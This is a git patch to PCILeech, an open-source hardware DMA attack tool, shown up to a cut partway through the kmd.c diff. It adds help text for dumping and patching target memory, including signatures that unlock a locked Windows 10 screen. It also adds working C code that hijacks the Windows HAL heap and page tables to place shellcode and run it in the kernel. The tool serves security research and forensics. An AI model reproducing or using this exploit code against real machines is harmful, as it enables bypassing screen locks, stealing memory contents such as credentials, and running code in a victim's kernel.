From 981e1fc1293a9e73dcf7681d4b26f3b8eb0043df Mon Sep 17 00:00:00 2001
From: ufrisk <github_ufrisk@frizk.net>
Date: Mon, 5 Sep 2016 19:33:27 +0200
Subject: [PATCH] Version 1.1

---
 pcileech/device.c                             |   5 +-
 pcileech/device.h                             |   2 +-
 pcileech/help.c                               | 332 ++++++++++++++++++
 pcileech/help.h                               |  14 +
 pcileech/kmd.c                                | 145 +++++++-
 pcileech/memdump.c                            |  58 +--
 pcileech/mempatch.c                           | 166 ++++++---
 pcileech/mempatch.h                           |   6 +-
 pcileech/pcileech.c                           | 153 ++------
 pcileech/pcileech.h                           |   9 +
 pcileech/pcileech.vcxproj                     |   2 +
 pcileech/pcileech.vcxproj.filters             |   6 +
 pcileech/shellcode.h                          |  46 +++
 pcileech/util.c                               |  84 ++++-
 pcileech/util.h                               |  37 +-
 pcileech_files/pcileech.exe                   | Bin 167424 -> 184320 bytes
 pcileech_files/signature_info.txt             |  34 +-
 pcileech_shellcode/pcileech_shellcode.vcxproj |   1 +
 .../pcileech_shellcode.vcxproj.filters        |   3 +
 pcileech_shellcode/wx64_stage2_hal.asm        | 244 +++++++++++++
 readme.md                                     |  52 ++-
 21 files changed, 1122 insertions(+), 277 deletions(-)
 create mode 100644 pcileech/help.c
 create mode 100644 pcileech/help.h
 create mode 100644 pcileech_shellcode/wx64_stage2_hal.asm

diff --git a/pcileech/device.c b/pcileech/device.c
index 7e941db..e4ebdae 100644
--- a/pcileech/device.c
+++ b/pcileech/device.c
@@ -105,7 +105,7 @@ BOOL DeviceReadDMA(_In_ PDEVICE_DATA pDeviceData, _In_ DWORD dwAddrPci32, _Out_
 	DWORD i, dwChunk;
 	if(cb % 0x1000) { return FALSE; }
 	if(cb > 0x01000000) { return FALSE; }
-	if(_DeviceIsInReservedMemoryRange(dwAddrPci32, cb)) { return FALSE; }
+	if(_DeviceIsInReservedMemoryRange(dwAddrPci32, cb) && !pDeviceData->IsAllowedAccessReservedAddress) { return FALSE; }
 	ZeroMemory(td, sizeof(THREAD_DATA_READ_EP) * 3);
 	if(cb < 0x00300000 || !pDeviceData->IsAllowedMultiThreadDMA) {
 		if(cb > 0x00800000) { // read max 8MB at a time.
@@ -291,7 +291,7 @@ VOID DeviceOpen_SetPipePolicy(_In_ PDEVICE_DATA pDeviceData)
 	WinUsb_SetPipePolicy(pDeviceData->WinusbHandle, pDeviceData->PipeDmaIn3, PIPE_TRANSFER_TIMEOUT, (ULONG)sizeof(BOOL), &ulTIMEOUT);
 }
 
-BOOL DeviceOpen(_Out_ PDEVICE_DATA pDeviceData)
+BOOL DeviceOpen(_In_ PCONFIG pCfg, _Out_ PDEVICE_DATA pDeviceData)
 {
 	BOOL result;
 	pDeviceData->HandlesOpen = FALSE;
@@ -326,6 +326,7 @@ BOOL DeviceOpen(_Out_ PDEVICE_DATA pDeviceData)
 	DeviceOpen_SetPipePolicy(pDeviceData);
 	pDeviceData->HandlesOpen = TRUE;
 	pDeviceData->IsAllowedMultiThreadDMA = IsWindows8OrGreater(); // multi threaded DMA read fails on WIN7.
+	pDeviceData->IsAllowedAccessReservedAddress = pCfg->fForceRW;
 	return TRUE;
 }
 
diff --git a/pcileech/device.h b/pcileech/device.h
index 787c283..3ec1d4b 100644
--- a/pcileech/device.h
+++ b/pcileech/device.h
@@ -40,7 +40,7 @@
 * -- pDeviceData = ptr to DeviceData to receive values on success.
 * -- result
 */
-BOOL DeviceOpen(_Out_ PDEVICE_DATA pDeviceData);
+BOOL DeviceOpen(_In_ PCONFIG pCfg, _Out_ PDEVICE_DATA pDeviceData);
 
 /*
 * Clean up various device related stuff and deallocate some meoory buffers.
diff --git a/pcileech/help.c b/pcileech/help.c
new file mode 100644
index 0000000..3047e5d
--- /dev/null
+++ b/pcileech/help.c
@@ -0,0 +1,332 @@
+// help.c : implementation related to displaying help texts.
+//
+// (c) Ulf Frisk, 2016
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#include "help.h"
+#include "util.h"
+
+VOID ShowListFiles(_In_ LPSTR szSearchPattern)
+{
+	WIN32_FIND_DATAA data;
+	HANDLE h;
+	CHAR szSearch[MAX_PATH];
+	Util_GetFileInDirectory(szSearch, szSearchPattern);
+	h = FindFirstFileA(szSearch, &data);
+	while(h != INVALID_HANDLE_VALUE) {
+		data.cFileName[strlen(data.cFileName) - 4] = 0;
+		printf("             %s\n", data.cFileName);
+		if(!FindNextFileA(h, &data)) {
+			return;
+		}
+	}
+}
+
+VOID Help_ShowGeneral()
+{
+	printf(
+		" PCILEECH COMMAND LINE REFERENCE                                               \n" \
+		" PCILeech can run in two modes - DMA (default) and Kernel Module Assisted (KMD)\n" \
+		" KMD mode may be triggered by supplying the option kmd and optionally cr3 / pt.\n" \
+		" If an address is supplied in the kmd option pcileech will use the already ins-\n" \
+		" erted KMD. The already inserted KMD will be left intact upon exit.  If the KMD\n" \
+		" contains a kernel mode signature the kernel module will be loaded and then un-\n" \
+		" loaded on program exit ( except for the kmdload command ).                    \n" \
+		" KMD mode may access all memory. DMA mode may only access memory below 4GB.    \n" \
+		" For more detailed help about a specific command type: pcileech <command> -help\n" \
+		" General syntax: pcileech.exe <command> [-<optionname1> <optionvalue1>] ...    \n" \
+		" Valid commands and valid MODEs [ and options ]:                               \n" \
+		"   info                   DMA,KMD                                              \n" \
+		"   dump                   DMA,KMD   [ min, max, out ]                          \n" \
+		"   patch                  DMA,KMD   [ min, max, sig, all ]                     \n" \
+		"   write                  DMA,KMD   [ min, in ]                                \n" \
+		"   search                 DMA,KMD   [ min, max, sig, in, all ]                 \n" \
+		"   [implant]                  KMD   [ in, out, s, 0..9 ]                       \n" \
+		"   kmdload                DMA       [ pt, cr3 ]                                \n" \
+		"   kmdexit                    KMD                                              \n" \
+		"   8051start              DMA,KMD   [ in ]                                     \n" \
+		"   8051stop               DMA,KMD                                              \n" \
+		"   flash                  DMA,KMD   [ in ]                                     \n" \
+		"   pagedisplay            DMA,KMD   [ min ]                                    \n" \
+		"   testmemread            DMA       [ min ]                                    \n" \
+		"   testmemreadwrite       DMA       [ min ]                                    \n" \
+		" Valid options:                                                                \n" \
+		"   -min : memory min address, valid range: 0x0..0xffffffffffffffff             \n" \
+		"          default: 0x0                                                         \n" \
+		"          For memory accesses over 0xffffffff KMD must be loaded.              \n" \
+		"          note that the address must be given in hexadecimal format.           \n" \
+		"   -max : memory max address, valid range: 0x0..0xffffffffffffffff             \n" \
+		"          default: 0xffffffff (4GB) in standard mode                           \n" \
+		"          default: actual memory size in KMD mode                              \n" \
+		"          For memory accesses over 0xffffffff KMD must be loaded.              \n" \
+		"          note that the address must be given in hexadecimal format.           \n" \
+		"   -out : name of output file.                                                 \n" \
+		"          default: pcileech-<minaddr>-<maxaddr>-<date>-<time>.raw              \n" \
+		"   -all : search all memory for signature - do not stop at first occurrence.   \n" \
+		"          Option has no value. Example: -all                                   \n" \
+		"   -force: force reads and writes even though target memory is marked as not   \n" \
+		"          accessible. Dangerous! Affects all modes and commands.               \n" \
+		"          Option has no value. Example: -force                                 \n" \
+		"   -help: show help about the selected command or implant and then exit        \n" \
+		"          without running the command. Affects all modes and commands.         \n" \
+		"          Option has no value. Example: -help                                  \n" \
+		"   -in  : file name or hexstring to load as input.                             \n" \
+		"          Examples: -in 0102030405060708090a0b0c0d0e0f or -in firmware.bin     \n" \
+		"   -s   : string input value.                                                  \n" \
+		"          Example: -s \"\\\\??\\C:\\Windows\\System32\\cmd.exe\"               \n" \
+		"   -0..9: QWORD input value. Example: -0 0xff , -3 0x7fffffff00001000 or -2 13 \n" \
+		"          default: 0                                                           \n" \
+		"   -pt  : trigger KMD insertion by automatic page table hijack.                \n" \
+		"          Option has no value. Example: -pt                                    \n" \
+		"          Only used in conjunction with -kmd option to trigger KMD insertion   \n" \
+		"          by page table hijack. Only recommended to use with care on computers \n" \
+		"          with 4GB+ RAM when kernel is located in high-memory (Windows 10).    \n" \
+		"          Insertion may trigger system crash unless signature exactly matches. \n" \
+		"   -cr3 : base address of system page table / CR3 CPU register.                \n" \
+		"          Valid range: 0x00..0xfffff000                                        \n" \
+		"          Insertion may trigger system crash unless signature exactly matches. \n" \
+		"   -kmd : address of already loaded kernel module helper (KMD).                \n" \
+		"          ALTERNATIVELY                                                        \n" \
+		"          kernel module to use, see list below for choices:                    \n" \
+		"             WIN10_X64   (WARNING! Unstable/Experimental)                      \n" \
+		"             LINUX_X64                                                         \n" \
+		"             OSX_X64                                                           \n" \
+	);
+	ShowListFiles("*.kmd");
+	printf(
+		"   -sig : available patches - including operating system unlock patches:       \n");
+	ShowListFiles("*.sig");
+	printf(
+		" Available implants:                                                           \n");
+	ShowListFiles("*.ksh");
+	printf("\n");
+}
+
+VOID Help_ShowInfo()
+{
+	printf(
+		" PCILEECH INFORMATION                                                          \n" \
+		" PCILeech (c) 2016 Ulf Frisk                                                   \n" \
+		" Version: 1.1                                                                  \n" \
+		" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007                 \n" \
+		" Contact information: pcileech@frizk.net                                       \n" \
+		" System requirements: 64-bit Windows 7, 10 or later.                           \n" \
+		" Other project references:                                                     \n" \
+		"   PCILeech          - https://github.com/ufrisk/pcileech                      \n" \
+		"   Slotscreamer      - https://github.com/NSAPlayset/SLOTSCREAMER              \n" \
+		"   Inception         - https://github.com/carmaa/inception                     \n" \
+		"   Google USB driver - http://developer.android.com/sdk/win-usb.html#download  \n" \
+		" ----------------                                                              \n" \
+		" Use with USB3380 hardware programmed as a pcileech device only.               \n" \
+		" Use with USB2 or USB3. USB3 is strongly recommended performance wise.         \n\n" \
+		" ----------------                                                              \n" \
+		" Driver information:                                                           \n" \
+		" The pcileech requires a dummy driver to function properly. The pcileech       \n" \
+		" device masks as a Google Glass. Please download and install the Google USB    \n" \
+		" driver before proceeding.                                                     \n" \
+		" ----------------                                                              \n" \
+		" Usage: connect USB3380 device to target computer and USB cable to the computer\n" \
+		" executing pcileech.exe.  If all memory reads fail try to re-insert the device.\n" \
+		" - It is only possible to access the lower 4GB of RAM (32-bit) with DMA.       \n" \
+		" - It may not be possible to access RAM if OS configured IOMMU (VT-d).         \n" \
+		"   OS X defaults to VT-d. Windows 10 may, if configured, also use VT-d.        \n" \
+		" - No drivers are needed on the target! Memory acquisition is all in hardware! \n" \
+		" - Confirmed working with PCIe/mPCIe/ExpressCard/Thunderbolt.                  \n" \
+		" - If kernel module is successfully inserted in lower 4GB RAM more RAM will be \n" \
+		"   possible to read. Extended funtionality will also be made available.        \n" \
+		" ----------------                                                              \n");
+	Help_ShowGeneral();
+}
+
+VOID _HelpShowExecCommand(_In_ PCONFIG pCfg)
+{
+	BOOL result;
+	PKMDEXEC pKmdExec = NULL;
+	result = Util_LoadKmdExecShellcode(pCfg->szShellcodeName, &pKmdExec);
+	if(!result) {
+		printf("HELP: Failed loading shellcode from file: '%s.ksh' ...\n", pCfg->szShellcodeName);
+		return;
+	}
+	printf(
+		" SHELLCODE IMPLANT HELP: Execute a custom implant in the target kernel.        \n" \
+		" MODES   : KMD                                                                 \n" \
+		" OPTIONS : -in, -out, -s, -0, -1, -2, -3, -4, -5, -6, -7, -8, -9               \n");
+	printf(" Implant loaded from file: %s.ksh\n", pCfg->szShellcodeName);
+	printf(
+		" Implant specific help (output values are left empty/set to zero):             \n" \
+		" ============================================================================= \n");
+	printf(pKmdExec->szOutFormatPrintf,	"", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
+	LocalFree(pKmdExec);
+}
+
+VOID Help_ShowDetailed(_In_ PCONFIG pCfg)
+{
+
+	switch(pCfg->tpAction) {
+	case DUMP:
+		printf(
+			" DUMP MEMORY FROM TARGET SYSTEM TO FILE.                                       \n" \
+			" MODES   : DMA, KMD                                                            \n" \
+			" OPTIONS : -min, -max, -out, -force                                            \n" \
+			" The physical memory is dumped to file. If no file is specified in the -out    \n" \
+			" option then a default named file is created. When dumping in DMA mode PCILeech\n" \
+			" tries to dump memory between 0-4GB unless a separate range is specified by the\n" \
+			" -min and -max parameters. When dumping in KMD mode readable physical memory   \n" \
+			" accessible to the kernel is dumped unless a separate range is specified in the\n" \
+			" -min and -max options. Memory related to PCIe and devices is not dumped (these\n" \
+			" memory ranges are written as zeroes) unless the -force option is specified.   \n" \
+			" Please note that using the -force option may result in a system crash.        \n" \
+			" The DUMP command dumps 4kB memory pages. Partial pages are not supported.     \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) dump memory up to 4GB by using native DMA:                                 \n" \
+			"    pcileech dump                                                              \n" \
+			" 2) dump memory as seen by the kernel:                                         \n" \
+			"    pcileech dump -kmd 0x7fffe000                                              \n" \
+			" 3) dump memory between 5GB and 6GB:                                           \n" \
+			"    pcileech dump -kmd 0x7fffe000 -min 0x140000000 -max 0x180000000            \n" \
+			" 4) dump memory to file c:\\temp\\out.raw:                                     \n" \
+			"    pcileech dump -kmd 0x7fffe000 -out \"c:\\temp\\out.raw\"                   \n");
+		break;
+	case WRITE:
+		printf(
+			" WRITE DATA TO TARGET SYSTEM MEMORY.                                           \n" \
+			" MODES   : DMA, KMD                                                            \n" \
+			" OPTIONS : -min, -in, -force                                                   \n" \
+			" WRITE will write contents specified in the -in option to the memory address   \n" \
+			" specified by the -min option. The memory address may be unaligned. It is also \n" \
+			" possible to try to write to non-accessible memory - such as PCIe memory mapped\n" \
+			" devices with the -force option. Please note that using the -force option may  \n" \
+			" result in a system crash. In KMD mode the write is performed by the target    \n" \
+			" operating system. In DMA mode the write is performed by the PCILeech device.  \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) write the bytes 11223344 to the physical address 0x1003                    \n" \
+			"    pcileech write -min 0x1003 -in 11223344                                    \n" \
+			" 2) write contents in the file replace.bin to the address 0x140000000          \n" \
+			"    pcileech write -min 0x140000000 -in replace.bin -kmd 0x7fffe000            \n" \
+			" 3) write the bytes 11223344 to the protected address 0xfffe0008               \n" \
+			"    pcileech write -min 0xfffe0008 -in 11223344 -force                         \n");
+		break;
+	case PATCH:
+		printf(
+			" PATCH THE MEMORY OF THE TARGET SYSTEM.                                        \n" \
+			" MODES   : DMA, KMD                                                            \n" \
+			" OPTIONS : -min, -max, -sig, -all, -force                                      \n" \
+			" Patch loads one or several signatures from the .sig file specified in the -sig\n" \
+			" option. The -sig option should be specified without file extension. The memory\n" \
+			" is scanned until the first signature match is made. The memory is then patched\n" \
+			" with new contents according to the loaded signature. After a match has been   \n" \
+			" made PCILeech exits. If all available memory should be searched for signatures\n" \
+			" please supply the -all option. The options -min and -max may also optionally  \n" \
+			" be given to limit the memory space searched. Patching is performed per 4096   \n" \
+			" byte page. Signatures spanning multiple pages are unsupported.                \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) try patch the memory with the unlock_win10x64 signature (kmd not loaded)   \n" \
+			"    pcileech patch -sig unlock_win10x64                                        \n" \
+			" 2) patch the memory with the unlock_win10x64 signature (kmd loaded)           \n" \
+			"    pcileech patch -sig unlock_win10x64 -kmd 0x7fffe000                        \n" \
+			" 3) patch all occurences with the patch_test signature                         \n" \
+			"    pcileech patch -sig patch_test -kmd 0x7fffe000 -all                        \n");
+		break;
+	case SEARCH:
+		printf(
+			" SEARCH THE MEMORY OF THE TARGET SYSTEM FOR THE GIVEN SIGNATURE.               \n" \
+			" MODES   : DMA, KMD                                                            \n" \
+			" OPTIONS : -min, -max, -sig, -in, -all, -force                                 \n" \
+			" Search the memory for signatures specified in the -sig or -in options. If the \n" \
+			" -sig option is specified signatures are loaded from the signature file and are\n" \
+			" search for at their fixed page offsets. If the signature is specified with the\n" \
+			" -in option the whole memory at all page offsets is searched. The memory ranges\n" \
+			" searched can be limited by supplying optional -min and -max options. It is    \n" \
+			" also possible to search restricted memory by supplying the -force option. When\n" \
+			" a signature is found the search is stopped unless the -all option is given.   \n" \
+			" Searching is performed per 4096 byte page. Signatures spanning multiple pages \n" \
+			" are unsupported.                                                              \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) search for the first location that matches the unlock_win10x64 signature.  \n" \
+			"    pcileech search -sig unlock_win10x64                                       \n" \
+			" 2) search for all locations that matches the unlock_win10x64 signature.       \n" \
+			"    pcileech search -sig unlock_win10x64 -all                                  \n" \
+			" 3) search for all unlock_win10x64 locations by using a kernel module.         \n" \
+			"    pcileech search -sig unlock_win10x64 -all -kmd 0x7fffe000                  \n" \
+			" 3) search for all locations that contain the pattern 444d4152.                \n" \
+			"    pcileech search -in 444d4152 -all -kmd 0x7fffe000                          \n" \
+			" 4) search for the first location containing the pattern in the file pat.bin.  \n" \
+			"    pcileech search -in pat.bin -all -kmd 0x7fffe000                           \n");
+		break;
+	case PAGEDISPLAY:
+		printf(
+			" DISPLAY A MEMORY PAGE ON SCREEN.                                              \n" \
+			" MODES   : DMA, KMD                                                            \n" \
+			" OPTIONS : -min, -force                                                        \n" \
+			" The memory contents of a single page (4096 bytes) is shown on screen. Use the \n" \
+			" -min option to specify the memory location. If the -min option is not aligned \n" \
+			" the specified memory address will be truncated. It is also possible to force  \n" \
+			" reading of otherwise inaccessible memory with the -force option.              \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) display the page starting at physical address 0x1000.                      \n" \
+			"    pcileech pagedisplay -min 0x1000                                           \n" \
+			" 2) display the normally restricted page at physical address 0xf0000.          \n" \
+			"    pcileech pagedisplay -min 0xf0000 -force                                   \n" \
+			" 3) display the page at address 0x140000000 (5GB).                             \n" \
+			"    pcileech pagedisplay -min 0x140000000 -kmd 0x7fffe000                      \n");
+		break;
+	case TESTMEMREAD:
+	case TESTMEMREADWRITE:
+		printf(
+			" TEST READING AND/OR READING+WRITING TO A PHYSICAL MEMORY ADDRESS.             \n" \
+			" MODES   : DMA                                                                 \n" \
+			" Used for debug purposes. Test reading and/or reading+writing to a physical    \n" \
+			" memory address with DMA. The address page read and optionally written to is   \n" \
+			" specified by the -min option. If the address is inside a protected range then \n" \
+			" the -force option could be specified to override. A number of reads and writes\n" \
+			" are executed. Unless there is a catastrophic failure the page is restored to  \n" \
+			" its original state after testing writes with testmemreadwrite.                \n" \
+			" EXAMPLES:                                                                     \n" \
+			" 1) test reading from the memory address at 0x1000                             \n" \
+			"    pcileech testmemread -min 0x1000                                           \n" \
+			" 1) test reading from the normally protected address 0xf4000000                \n" \
+			"    pcileech testmemread -min 0xf4000000 -force                                \n" \
+			" 2) test reading and writing to/from the memory address 0x1000                 \n" \
+			"    pcileech testmemreadwrite -min 0x1000                                      \n");
+		break;
+	case KMDLOAD:
+		printf(
+			" LOAD A KERNEL MODULE INTO THE OPERATING SYSTEM KERNEL FOR LATER USE.          \n" \
+			" MODES   : DMA                                                                 \n" \
+			" OPTIONS : -kmd, -pt, -cr3                                                     \n" \
+			" Load a kernel module into the running operating system kernel for later use.  \n" \
+			" The kernel module is specified in the -kmd paramter. If the specified kernel  \n" \
+			" module is generic and memory searches are supported it will be searched for   \n" \
+			" in memory. Specialized windows 10 kernel module are loaded by hi-jacking the  \n" \
+			" page table. The page table is searched for automatically with the -pt option. \n" \
+			" The page table base may also optionally be specified in the -cr3 option.      \n" \
+			" EXAMPLES:                                                                     \n" \
+			" 1) load a kernel module into Windows Vista by specifying a generic signature. \n" \
+			"    pcileech kmdload -kmd winvistax64                                          \n" \
+			" 2) load a kernel module into Linux by specifying a generic signature.         \n" \
+			"    pcileech kmdload -kmd LINUX_X64                                            \n" \
+			" 3) load a kernel module into Windows 10 by targeting a specific driver.       \n" \
+			"    pcileech kmdload -kmd win10x64_ntfs_20160716 -pt                           \n");
+		break;
+	case KMDEXIT:
+		printf(
+			" UNLOAD AN ACTIVE KERNEL MODULE FROM THE TARGET SYSTEM.                        \n" \
+			" MODES   : KMD                                                                 \n" \
+			" OPTIONS :                                                                     \n" \
+			" Unload an active kernel module from the target system. The already active     \n" \
+			" kernel module is asked to terminate and clean up itself as best as possible.  \n" \
+			" After running the kmdexit command it will not be possible to access the       \n" \
+			" kernel module any more.                                                       \n" \
+			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+			" 1) unload the already loaded kernel module.                                   \n" \
+			"    pcileech kmdexit -kmd 0x7fffe000                                           \n");
+		break;
+	case EXEC:
+		_HelpShowExecCommand(pCfg);
+		break;
+	default:
+		printf(
+			" Detailed help for this command or implant is not available.                   \n");
+		break;
+	}
+}
\ No newline at end of file
diff --git a/pcileech/help.h b/pcileech/help.h
new file mode 100644
index 0000000..eb0f18a
--- /dev/null
+++ b/pcileech/help.h
@@ -0,0 +1,14 @@
+// help.h : definitions related to displaying help texts.
+//
+// (c) Ulf Frisk, 2016
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifndef __HELP_H__
+#define __HELP_H__
+#include "pcileech.h"
+
+VOID Help_ShowGeneral();
+VOID Help_ShowDetailed(_In_ PCONFIG pCfg);
+VOID Help_ShowInfo();
+
+#endif /* __HELP_H__ */
\ No newline at end of file
diff --git a/pcileech/kmd.c b/pcileech/kmd.c
index a85da66..ed0d3b4 100644
--- a/pcileech/kmd.c
+++ b/pcileech/kmd.c
@@ -99,6 +99,8 @@ typedef struct tdKERNELSEEKER {
 #define STAGE2_OFFSET_FN_STAGE1_ORIG	8
 #define STAGE2_OFFSET_EXTRADATA1		16
 
+BOOL KMD_GetPhysicalMemoryMap(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Inout_ PKMDHANDLE phKMD);
+
 //-------------------------------------------------------------------------------
 // Signature mathing below.
 //-------------------------------------------------------------------------------
@@ -345,6 +347,139 @@ BOOL KMD_LinuxKernelSeekSignature(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceDa
 	return result;
 }
 
+//-------------------------------------------------------------------------------
+// Windows 8/10 generic kernel signature below.
+//-------------------------------------------------------------------------------
+
+BOOL KMD_Win_SearchTableHalpInterruptController(_In_ PBYTE pbPage, _In_ QWORD qwPageVA, _Out_ PDWORD dwHookFnPgOffset)
+{
+	DWORD i;
+	BOOL result;
+	for(i = 0; i < (0x1000 - 0x78); i += 8) {
+		result =
+			(*(PQWORD)(pbPage + i + 0x18) == 0x28) &&
+			((*(PQWORD)(pbPage + i + 0x00) & ~0xfff) == qwPageVA) &&
+			((*(PQWORD)(pbPage + i + 0x10) & ~0xfff) == qwPageVA) &&
+			((*(PQWORD)(pbPage + i + 0x78) & 0xffffff0000000000) == 0xfffff80000000000);
+		if(result) {
+			*dwHookFnPgOffset = i + 0x78;
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+// https://blog.coresecurity.com/2016/08/25/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-3-windows-hals-heap/
+BOOL KMDOpen_HalHeapHijack(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData)
+{
+	DWORD ADDR_HAL_HEAP_PA = 0x00001000;
+	QWORD ADDR_SHELLCODE_VA = 0xffffffffffc00100;
+	BOOL result;
+	SIGNATURE oSignature;
+	PKMDHANDLE pKMD = NULL;
+	PDWORD pdwPhysicalAddress;
+	BYTE pbHal[0x1000] = { 0 }, pbPT[0x1000] = { 0 }, pbNULL[0x300] = { 0 };
+	DWORD dwHookFnPgOffset;
+	QWORD qwPML4, qwAddrHalHeapVA, qwPTEOrig, qwPTEPA, qwPTPA;
+	//------------------------------------------------
+	// 1: Fetch hal.dll heap and perform sanity checks.
+	//------------------------------------------------
+	Util_CreateSignatureWindowsHalGeneric(&oSignature);
+	result = DeviceReadDMARetryOnFail(pDeviceData, ADDR_HAL_HEAP_PA, pbHal, 0x1000);
+	qwPML4 = *(PQWORD)(pbHal + 0xa0);
+	qwAddrHalHeapVA = *(PQWORD)(pbHal + 0x78);
+	if(!result || (qwPML4 & 0xffffffff00000fff) || ((qwAddrHalHeapVA & 0xfffffffffff00fff) != 0xffffffffffd00000)) {
+		printf("KMD: Failed. Error reading or interpreting hal heap #1.\n");
+		goto fail;
+	}
+	result = Util_PageTable_ReadPTE(pCfg, pDeviceData, qwPML4, qwAddrHalHeapVA, &qwPTEOrig, &qwPTEPA);
+	if(!result || ((qwPTEOrig & 0x00007ffffffff003) != 0x1003)) {
+		printf("KMD: Failed. Error reading or interpreting hal PTE.\n");
+		goto fail;
+	}
+	//------------------------------------------------
+	// 2: Search for function table in hal.dll heap.
+	//------------------------------------------------
+	for(qwAddrHalHeapVA = 0xffffffffffd00000; qwAddrHalHeapVA < 0xffffffffffe00000; qwAddrHalHeapVA += 0x1000) {
+		result =
+			Util_PageTable_ReadPTE(pCfg, pDeviceData, qwPML4, qwAddrHalHeapVA, &qwPTEOrig, &qwPTEPA) &&
+			((qwPTEOrig & 0x00007fff00000003) == 0x00000003) &&
+			DeviceReadDMARetryOnFail(pDeviceData, (qwPTEOrig & 0xfffff000), pbHal, 0x1000) &&
+			KMD_Win_SearchTableHalpInterruptController(pbHal, qwAddrHalHeapVA, &dwHookFnPgOffset);
+		if(result) {
+			break;
+		}
+	}
+	if(!result) {
+		printf("KMD: Failed. Failed finding entry point.\n");
+		goto fail;
+	}
+	qwPTPA = qwPTEPA & ~0xfff;
+	result = DeviceReadDMARetryOnFail(pDeviceData, (DWORD)qwPTPA, pbPT, 0x1000);
+	if(!result || memcmp(pbPT, pbNULL, 0x300)) { // first 0x300 bytes in Hal PT must be zero
+		printf("KMD: Failed. Error reading or interpreting PT.\n");
+		goto fail;
+	}
+	//------------------------------------------------
+	// 3: Write shellcode into page table empty space.
+	//------------------------------------------------
+	*(PQWORD)pbPT = qwPTPA | 0x63; // PTE for addr: 0xffffffffffc00000
+	memcpy(pbPT + 0x100, oSignature.chunk[3].pb, oSignature.chunk[3].cb);
+	*(PQWORD)(pbPT + 0x100 + STAGE2_OFFSET_FN_STAGE1_ORIG) = *(PQWORD)(pbHal + dwHookFnPgOffset);
+	*(PQWORD)(pbPT + 0x100 + STAGE2_OFFSET_EXTRADATA1) = qwAddrHalHeapVA + dwHookFnPgOffset;
+	printf("INFO: PA PT:     0x%08x\n", qwPTPA);
+	printf("INFO: PA FN:     0x%08x\n", (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset);
+	DeviceWriteDMA_Retry(pDeviceData, (DWORD)qwPTPA, pbPT, 0x300);
+	//------------------------------------------------
+	// 4: Place hook by overwriting function addr in hal.dll heap.
+	//------------------------------------------------
+	Sleep(250);
+	DeviceWriteDMA_Retry(pDeviceData, (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset, (PBYTE)&ADDR_SHELLCODE_VA, sizeof(QWORD));
+	printf("KMD: Code inserted into the kernel - Waiting to receive execution.\n");
+	//------------------------------------------------
+	// 5: wait for patch to reveive execution.
+	//------------------------------------------------
+	pdwPhysicalAddress = (PDWORD)(pbPT + 0x100 + STAGE2_OFFSET_STAGE3_PHYSADDR);
+	do {
+		Sleep(100);
+		if(!DeviceReadDMARetryOnFail(pDeviceData, (DWORD)qwPTPA, pbPT, 4096)) {
+			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+			goto fail;
+		}
+	} while(!*pdwPhysicalAddress);
+	printf("KMD: Execution received - continuing ...\n");
+	//------------------------------------------------
+	// 6: Restore hooks to original.
+	//------------------------------------------------
+	Sleep(250);
+	DeviceWriteDMA(pDeviceData, (DWORD)qwPTPA, pbNULL, 0x300);
+	//------------------------------------------------
+	// 7: Set up kernel module shellcode (stage3)
+	//------------------------------------------------
+	if(*pdwPhysicalAddress == 0xffffffff) {
+		printf("KMD: Failed. Stage2 shellcode error.\n");
+		goto fail;
+	}
+	DeviceWriteDMA(pDeviceData, *pdwPhysicalAddress + 0x1000, oSignature.chunk[4].pb, 4096);
+	if(!(pKMD = LocalAlloc(LMEM_ZEROINIT, sizeof(KMDHANDLE)))) { goto fail; }
+	pKMD->dwPageAddr32 = *pdwPhysicalAddress;
+	pKMD->status = (PKMDDATA)pKMD->pbPageData;
+	DeviceReadDMA(pDeviceData, pKMD->dwPageAddr32, pKMD->pbPageData, 4096);
+	//------------------------------------------------
+	// 8: Retrieve physical memory range map and complete open action.
+	//------------------------------------------------
+	if(!KMD_GetPhysicalMemoryMap(pCfg, pDeviceData, pKMD)) {
+		printf("KMD: Failed. Failed to retrieve physical memory map.\n");
+		goto fail;
+	}
+	pDeviceData->KMDHandle = (HANDLE)pKMD;
+	if(pCfg->tpAction == KMDLOAD) { pCfg->qwKMD = pKMD->dwPageAddr32; }
+	return TRUE;
+fail:
+	LocalFree(pKMD);
+	return FALSE;
+}
+
 //-------------------------------------------------------------------------------
 // KMD command function below.
 //-------------------------------------------------------------------------------
@@ -400,7 +535,7 @@ BOOL KMDReadMemory_DMABufferSized(_In_ PDEVICE_DATA pDeviceData, _In_ QWORD qwAd
 {
 	BOOL result;
 	PKMDHANDLE phKMD = (PKMDHANDLE)pDeviceData->KMDHandle;
-	if(!KMD_IsRangeInPhysicalMap(phKMD, qwAddress, cb)) {
+	if(!KMD_IsRangeInPhysicalMap(phKMD, qwAddress, cb) && !pDeviceData->IsAllowedAccessReservedAddress) {
 		if(cb <= 0x1000) { // Return blank memory and ok on 1 page read (smallest unit) if not in physical map.
 			memset(pb, 0, cb);
 			return TRUE;
@@ -420,7 +555,7 @@ BOOL KMDWriteMemory_DMABufferSized(_In_ PDEVICE_DATA pDeviceData, _In_ QWORD qwA
 {
 	BOOL result;
 	PKMDHANDLE phKMD = (PKMDHANDLE)pDeviceData->KMDHandle;
-	if(!KMD_IsRangeInPhysicalMap(phKMD, qwAddress, cb)) { return E_FAIL; }
